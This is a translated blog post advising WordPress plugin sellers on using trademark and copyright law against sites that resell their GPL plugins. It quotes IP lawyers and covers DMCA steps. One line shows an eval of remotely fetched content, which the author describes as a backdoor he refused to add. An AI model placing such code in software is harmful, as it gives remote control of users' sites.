合法保护您的 GPL WordPress 插件业务免受巨魔攻击的终极指南

已发表: 2016-01-12

软件许可可能是一个非常令人困惑的主题,尤其是在开源世界中。 合法性和道德的界限并不总是清晰的。 但作为专注于销售 WordPress GPL 插件的企业主,我们有责任彻底了解这些主题。

这篇文章不会涉及道德问题,而是关注法律方面的考虑。 它将为您提供一个逐步可行的公式,包括来自该领域经验丰富的律师的反馈,以保护您的 WordPress 业务免受插件“巨魔”的侵害。

作为过去五年的插件开发人员,我阅读了大量讨论 GPL、它的自由以及与运行符合 GPL 的业务相关的挑战的文章。 但在过去的几个月里,这个话题对我来说变得更加重要。

8 月,一个名为 WordPress Plugins (https://twitter.com/plugswp) 的 Twitter 帐户关注了我。 作为一种习惯,我检查了他们的个人资料以了解有关该用户的更多信息。 我很快发现该处理程序与“wppluginscheap.com”相关联,这是一个插件和主题“巨魔”,自称是“廉价高级 WordPress 插件和主题的第一来源”。 浏览该网站,我发现了许多流行的高级插件,如 Yoast SEO、Backup Buddy、WP Robot 和 50 个高级主题。 每件产品售价不到 10 美元。

便宜的 WordPress 插件

虽然我很天真,但我跳上了 WPChat 并开始了一个新线程:

我们一直在编码威胁,一些巨魔会弹出并以荒谬的价格转售我们的 GPL 插件/主题。 嗯……它就在这里 以 4.00 美元的价格购买 Yoast Premium SEO 怎么样……我有点生气,另一方面也很有趣,因为我知道它总有一天会出现。

WPChat WordPress 插件转售 GPL

我向社区提出了两个问题:
1.我们如何把它取下来?
2. 你觉得受到威胁吗?

同时,我去了 Advanced WordPress Facebook 群组,并上传了以下状态:

Joost de Valk 和 Thomas Hofter 除非你们开始以低于 10 美元的价格出售您的插件,否则我认为这些人侵犯了您的商标(以及许多其他插件开发人员)。 我们如何把它弄下来?

高级 WordPress 插件巨魔线程
如果您是 AWP 组的成员,您可以在此处查看整个线程。

这两个主题都引起了很多兴趣和讨论。 我在 WPChat 中收到了 17 条回复,在 AWP Facebook 群组中收到了 84 条评论。 一旦回复开始堆积起来,我意识到两件事:
1. WordPress 插件/主题巨魔是一种流行病——它无处不在!

这已经发生了很长时间,尽管主要是主题和 WooCommerce 插件。 参见 gplclub.org 和 sozot.com。 WPAvengers.com 在关闭之前做了类似的事情。

– Leland Fiegel,WPChat 创始人

2. 尽管有数百篇关于 GPL 许可证各个方面的博客文章,但生态系统中仍然存在很多混乱。 即使在有影响力的人中。 似乎很多人认为这样做在技术上是可以的(尽管不道德),因为插件和主题是在 GPL 下获得许可的。

这些机会主义者时不时地冒出来,似乎从来没有成功过。 这是合法的(无论如何,GPL 部分)但不道德。 它很懒惰。 这对客户不利,因为货物的形状有问题、过时、不受支持和可疑。

– Steven Gliebe,主题开发者和 Pro Plugin Directory 创始人

这是不道德的,但是如果我作为一个在 GPL 下发布的主题/插件商店所有者,我会这么说,我觉得如果我能这么说的话,我比那些家伙更不道德,而且是一个彻头彻尾的伪君子。

– Ionut Neagu,CodeinWP 创始人

Facebook 上收到的其他评论包括:

  • 如果这些插件是在 GPL 下获得许可的,那么恐怕他们什么也做不了
  • 我认为高级版本不属于 GPL
  • 这是合法的,在 GPL 下

而且还有更多!

所以在我们开始之前,让我先澄清一点——

这是完全错误的!

即使他们的插件是在开源许可下分发的,开发人员仍然拥有可执行的权利。
这些“插件巨魔”仍可能对商标侵权和/或版权侵权负责。

我想补充一点,我已经阅读了很多意见,说这些巨魔不会对企业造成伤害。 如果是这样的话,我就不会费心花这么多时间来编译这篇文章了。 我想借此机会解释巨魔对 WordPress 社区不利的原因——对您的企业和 WordPress 用户都是如此。

为什么插件巨魔对您的插件业务不利?

收入损失

不管你喜不喜欢,大部分用户都会从这个网站购买或获取你的高级插件。 特别是 WordPress 新手。 如果我是 WordPress 生态系统的新手并正在寻找 SEO 插件,那么 4 美元的 Yoast SEO 听起来比全价更具吸引力。 我会买的。 就像我在购买智能手机或其他产品时总是寻找最好的折扣一样。 我不需要“原始保修”,因为我从未将它用于我购买的任何产品,因此用户从一开始就没有考虑到支持。

支持滥用

如果从巨魔那里购买的插件有任何问题——猜猜谁应该为此负责? 当然是真正的开发商/公司。 如果与您的品牌相关的艺术品被复制,客户将与您联系。 就像我在亚马逊上购买 HTC 智能手机一样,当我遇到设备问题时,我会致电 HTC 技术支持,而不是亚马逊。 你会告诉用户什么? “是的,这是我们的手机,但您需要联系亚马逊以获得技术支持。” 用户很难消化这种响应。看起来您并没有站在您的产品后面。

如果从巨魔那里购买的插件有任何问题——猜猜谁应该为此负责?Tweet

品牌损害

毫无疑问,一些巨魔将恶意代码注入插件。 这样做的主要动机是在免费分发高级插件的同时产生收入。 我亲眼目睹了这一点。 两年前,一位来自英国一家大型机构(超过 100 名员工)的高级 SEO 人员找到了我。 . 他提议通过在我们的插件中添加一行简单的代码来与我合作:
eval(wp_remote_get( 'http://www.company.com/path/to/api/endpoint/' )['body']);

这个想法是 API 端点将返回隐藏的 URL 以推送其投资组合公司的反向链接。 他发送的示例之一是:

<a href="”http://www.portfolio-company.com”">Great Company</a>

巨魔可能会在使用您的原始品牌时将恶意代码注入插件,直接损害您的品牌!

这是在谷歌企鹅之前,是一个伟大的 SEO 黑客。 优惠也很棒——每个域名每月 0.1 美元。 因此,如果我有 100,000 个使用我的插件的活动域,我可以每月产生 10,000 美元。 无需额外花费一分钟即可获得收入。 厉害吧? 显然我们没有这样做,出于各种原因,主要是因为这段代码非常恶意。 它会打开一个远程后门来对站点做任何你想做的事情。 即使该机构仅打算将其用于搜索引擎优化,如果他们的服务器被黑客入侵并且有恶意的人控制了会发生什么? 谁知道有多少合法的 WordPress.org 插件与该机构合作......回到巨魔身上,他们的意图纯粹是财务上的。 他们不是为了好玩而推广您的高级插件,而是为了赚钱。 而且,如果他们从事诸如侵犯版权和商标权之类的非法行为,那么没有什么能阻止他们产生诸如代码注入之类的替代收入流。 哦,我忘了说,如果发生这样的事情,你应该受到责备! 这是你的产品,也是你的品牌。

订阅并获取我们的书的免费副本

11 种行之有效的技巧,可将您的信用卡纠纷胜诉率提高 740%

与朋友分享

输入您朋友的电子邮件地址。 我们只会通过电子邮件向他们发送这本书,童子军的荣幸。

谢谢你的分享

太棒了 - 一份“11 个经验证的将信用卡纠纷胜诉率提高 740% 的技术”的副本刚刚发送到. 想帮助我们更多地传播信息吗? 继续,与您的朋友和同事分享这本书。

感谢订阅!

- 我们刚刚将您的“11 种经过验证的技术,可将您的信用卡纠纷胜诉率提高 740%”的副本发送至.

您的电子邮件中有错字吗? 单击此处编辑电子邮件地址并再次发送。

封面
封面

为什么插件巨魔对用户不利?

出于我提到的许多相同原因,但从用户的角度来看。

没有支持

当面临技术问题时,巨魔无法帮助您。 这不是他们的产品,他们对代码或如何解决任何相关问题一无所知。 此外,他们没有支持资源来做到这一点。 如果您尝试联系原始公司,高级插件开发人员拥有跟踪客户的基础设施。 在您购买原始许可证之前,该公司通常不会为您提供帮助。

插件的非法再分发者不能也不会帮助您解决技术问题。Tweet

没有自动更新

当今市场上的大多数高级插件都有许可和更新机制(巨魔经常在重新分发插件之前“破解”这部分)。 这种自动更新机制的工作方式是每 24 小时一次,插件会检查原始公司的服务器以查看是否有任何高级版本的更新。 它还使用许可证密钥进行身份验证。 由于 troll 的插件从未使用原始公司的许可证密钥颁发,因此此更新机制将不起作用。 因此,每次安装非原创高级插件时,都不会自动更新。 这很糟糕,因为黑客不断发现新的创造性漏洞,而过时的高级插件可能是安全漏洞。

盗版 WordPress 插件没有自动更新机制 – 持续存在安全漏洞!Tweet

重大安全漏洞

还记得我上面提到的恶意的一行代码吗? 您想让您的网站后门对黑客开放吗? 这个后门实际上使黑客能够修改您网站上的每个像素和内容。 这只是一个例子,我相信还有很多其他的创意注入。

开源许可证涵盖哪些内容?

由于开发人员社区对这些问题显然存在很多困惑,因此我联系了我的朋友 Ariel Reinitz 和他的同事 Matthew Hintz,他们是 Lowenstein Sandler LLP 的知识产权 (IP)(专利、​​商标和版权)律师,一家全国性的公司,办事处从纽约到帕洛阿尔托。

Ariel 向我解释说,虽然 WP 插件“巨魔”在技术上可能有权重新分发处于开源许可(例如 GPL)下的代码,但开源未涵盖其他知识产权(“IP”)权利这些“巨魔”可能仍在侵犯的许可。

阿里尔·莱尼茨

Ariel Reinitz,知识产权律师

以下是 Ariel 对 GPL 的评价:

重要的是要了解大多数 WordPress 插件分发所依据的开源许可证 (GPLv2) 涵盖(和不涵盖)的内容:

开源许可证规定了如何分发软件/源代码。 通常,此类许可允许任何人免费使用、修改等软件/代码。 因此,开源项目的源代码可以被其他方重新分发,而不会违反 GPL 的条款。

简而言之——GPL 自由允许任何人获取源代码并用它做任何他想做的事情,包括分发。 我相信社区中在这方面达成了共识。

开源许可证不涵盖哪些内容?

但是,开源许可证(包括 GPLv2)通常不会扩展到商标。 商标与产品(例如,插件、主题、应用程序等)的品牌方式有关——例如,产品(和/或产品来源的公司)的名称、标语/口号,以及/或其标志。 因此,虽然项目的源代码可以在开源许可下自由再分发,但这样的许可不会授予他人与项目相关的商标的任何权利(例如,产品名称、开发它的公司、等等。)。

用非律师的话来说——GPL 不允许使用任何插件的商标,如产品名称、公司名称和徽标。 爱丽儿给我们举了一个例子:

因此,例如,如果第三方使用项目的所有原始品牌重新分发 WordPress 插件(例如,使用公司/项目的原始名称、徽标等进行宣传),这可能会侵犯原始开发人员的商标权利。 如前所述,开源许可证不允许某人在商业环境中使用他人的品牌 这一点很重要,因为商标法的主要原则之一是保护消费者不会混淆产品的来源。

商标法的主要原则不仅是为了保护企业,而且是为了保护消费者免于混淆产品的来源。 这是重要的注意事项!

认识到许多开源公司注册、保护和监管其商标权也很重要。 示例包括: Linux MySQL Red HatWordPress

Ariel 在这里所说的是,许多开源领域的知名人士都保护和监督他们的商标权。 为什么我们不应该这样做?

如果红帽可以保护和监管他们的商标权,为什么插件开发人员不能?

除了商标权,Ariel 指出,开发人员还有权对其制作的不属于源代码的材料获得版权保护:

同样重要的是要认识到 GPL(和其他开源许可证)仅涵盖插件本身的源代码。 但是,如果开发人员创建了不属于源代码的材料(例如,图形、宣传材料、包装等),这些材料将不属于 GPL,开发人员没有义务允许另一方重新分配材料。

例如,看看上面提到的一些“巨魔”网站如何使用“Yoast”插件。 虽然这些网站在技术上可能能够重新分发 Yoast 的源代码(因为它属于 GPL),但这些网站还包含 Yoast 的品牌(例如,Yoast 的名称和徽标,它们是商标)等元素以及由Yoast(例如,喝茶的人的图形,它不是 Yoast 源代码的一部分,因此版权归Yoast 所有,不受 GPL 约束)。

所以——虽然巨魔可能在法律上有权重新分发 Yoast 的源代码,但 GPL(或其他开源许可证)并没有赋予他们使用 (a) Yoast 的品牌(商标)或 (b) 其他图形、材料等的权利.,(版权) 。 由于它们不是插件源代码的一部分,因此这些项目不属于 GPL,因此这些项目的知识产权 (IP) 权利是开发人员的唯一财产

由于插件“巨魔”使用开发者的商标和受版权保护的材料(如上面的“Yoast”示例),开发者可以使用法律程序(我们将在下面详细探讨)来执行这些权利,以便阻止、劝阻或至少尝试限制这些“巨魔”可能对您的业务产生的影响。 同样,即使您的插件是在 GPL 下分发的,也是如此。

什么受商标保护?

马修·欣茨

Matthew Hintz,知识产权律师

Matthew 解释了商标涵盖的内容:

简而言之,商标是消费者区分商品或服务来源与其他来源的唯一标识符。 大多数情况下,商标是一个词、徽标或这些元素的某种组合。 在美国,商标权始于商业用途(称为“普通法权利”),而不是通过在美国专利商标局 (USPTO) 注册。 但是,在 USPTO 注册您的商标可为所有者提供许多普通法权利无法获得的好处。 值得注意的是,这些证据包括注册人在整个美国就注册中规定的商品或服务使用商标的专有权利的证据,注册人是商标所有者的建设性通知,在美国专利商标局的注册清单在线数据库,以及使用符号的能力。 (在注册之前,TM 符号可以与商标一起使用。)

代码受商标保护吗?

在我的研究过程中,我阅读了一些帖子,其中提到在分叉 GPL 许可插件或主题时,必须重构代码以确保没有包含商标标识符作为函数名称一部分的函数。 为了澄清这一点,我问马修代码是否也受商标保护,答案如下:

代码本身不受商标保护。 商标保护消费者与您的商品或服务相关联的文字或徽标。 那么,插件商标保护的限制将是用于向消费者推销插件的单词或徽标。 那么商标侵权的根本检验是消费者是否会被两个商标的相似性所混淆。 相似性是通过查看视觉和语音相似性、每个商标的商品/服务的相关程度、商标的独特性以及商标使用时间等因素来评估的。

用开发人员友好的语言澄清答案:

  • 类名、函数名、变量名和常量名不受商标保护。
  • 另一方面,打印在页面上并对最终用户可见的字符串受商标保护。

如何申请商标注册?

要获得商标联邦注册的好处,您的商标必须在美国专利商标局注册。 注册申请必须包括基本信息:申请人/所有人的姓名、商标、与该商标一起使用的商品或服务、在这些商品或服务上使用该商标的证据,以及该商标的首次使用日期. 您的应用的注意事项:

  • 在 USPTO 的 TESS (http://www.uspto.gov/trademark ) 数据库中搜索相同或相似的商标。 如果申请或已注册相同或相似的商标,这些可能会成为拒绝您申请的依据。 也可以通过谷歌或其他搜索服务进行搜索,因为一个商标可以在没有注册的情况下使用,并且尽管您已经注册,但对该商标拥有更高的权利。 注册不会用尽在先用户的商标权。
  • 如需描述您的商品或服务,请在 USPTO 的 ID 手册中搜索可接受的语言: http ://tess2.uspto.gov/netahtml/tidm.html 您还可以在 TESS 上搜索可接受的语言。
  • 类别是与商品或服务的某些领域相关的一般指示。 例如,可下载插件通常属于第 9 类,涵盖所有计算机程序和软件。
  • 商标申请的费用取决于类别的数量。 一般费用为每类 275 美元,但提供更便宜和更昂贵的申请选项。

提交申请后,USPTO 将审查该申请以确定该商标是否为唯一标识符(即,与先前提交的申请或注册不具有描述性或混淆性相似)。 美国专利商标局提供申请时间表: http ://www.uspto.gov/trademark/trademark-timelines/trademark-application-and-post-registration-process-timelines

请记住,商标保护是地域性的。 例如,在美国的注册将在美国提供商标保护。

正如马修所描述的,这个过程并不一定很复杂——但它确实需要时间和精力。 我建议请一位中级律师为您做这件事。 这项工作应该花费您 200 至 2,000 美元,尽管它会节省您的时间并确保更好的应用程序。 无论如何,在你开始之前,谷歌吧! 如果您找到与您的确切术语/短语匹配的产品或公司(特别是在相同或相似领域),则很有可能您将无法注册商标(并且您实际上可能侵犯了他人的商标)。

商标被侵权怎么办?

我将从你不应该做的事情开始——如果它是商标侵权,而不是版权,你不应该提交 DMCA 删除。

DMCA 仅涵盖版权侵权。 商标没有类似的规定。 对商标索赔使用 DMCA 删除通知可能会导致索赔人对虚假陈述负责。

尝试直接与网站所有者解决问题通常是最简单的。 如果这不成功,您可以对网站所有者、主机等提起法律诉讼。您采取的具体方法可能会针对具体情况,此时,我建议您联系律师以了解在您的具体情况下的最佳选择.

什么受版权保护?

版权不同于商标。 版权保护以某种表达方式固定的原创作品。 然而,版权保护的一个限制是它只延伸到表达,而不是想法。 受版权保护的作品类别包括文学作品(书籍、代码)、音乐作品、照片和图像、电影、录音等类别。 另一个限制是版权不保护短语或表达方式——这仍然适用于商标保护,只要它们作为消费者的唯一标识符,将商品或服务的来源与其他人区分开来。

当您的版权受到侵犯时该怎么办?

  1. 最初,尝试直接联系网站所有者通常是最简单的。 在许多情况下,网站所有者并不比您更感兴趣的是聘请律师、参与法律诉讼等。尝试找到 twitter 帐户、联系电子邮件或网站上的联系页面,并发送消息要求删除您在网站上的商标插件。
  2. 如果没有帮助,您可以发送 DMCA 删除通知(数字千年版权法案)。 有很多生成器可以帮助您创建一个,只需在 google 上搜索“dmca takedown generator”。 收到通知后,您需要将其发送给网站所有者、托管公司和 ISP。 您也可以选择向搜索引擎提交通知,以从搜索结果中删除该网站。 要查找托管公司,您可以使用 whoishostingthis.com 等网站。 要查找 ISP,您可以使用 http://www.whoismyisp.org/ 等网站。 要找到将 DMCA 提交给 ISP/Hosting 的相关链接,请在 google 上搜索 ISP_NAME/HOSTING_NAME + DMCA。

或者,您可以对网站所有者、主机等提起法律诉讼。我建议联系律师以了解在您的具体情况下这是否是最佳选择。

结论

我希望这组分步说明能够为您提供正确的工具来保护您的 GPL 插件业务免受巨魔的侵害。 只是一个回顾:

  • 作为企业主,您有资格,并且应该保护您公司的品牌和资产。
  • 商标和版权是合法保护您的插件业务的相对便宜且有效的方法。 因此,您应该强烈考虑为您的公司名称和产品名称注册商标。
  • 许多巨魔侵犯了版权(例如,通过提升您的宣传图片)和商标(通过使用您的品牌名称)。 通过创建独特的品牌名称、徽标和艺术品,您可以生成一个组合来帮助打击版权侵权。

许多巨魔侵犯了版权和商标。 通过创建独特的品牌名称、徽标和艺术作品,您可以生成一个组合来帮助打击版权侵权。Tweet


如果第三方网站在未经您同意的情况下列出了您的高级 GPL 插件或主题以供出售或赠送:

  • 如果该网站使用您的原创作品或其他材料——这很可能侵犯了版权。 您可以提交 DMCA 删除。
  • 如果该网站使用您公司或产品的商标,则很可能是商标侵权。 您可以对该网站提起法律诉讼。

如果您对 GPL 的法律和道德影响有任何其他想法,请随时在下面的评论中分享。

大参考:

  • 针对 WP Migrate DB Pro 的分叉发布 DMCA 删除通知
  • GPL 许可证不提供侵犯注册商标的自由
  • WordPress GPL 是否被滥用?
  • 为什么我们要为 GPL 许可代码付费?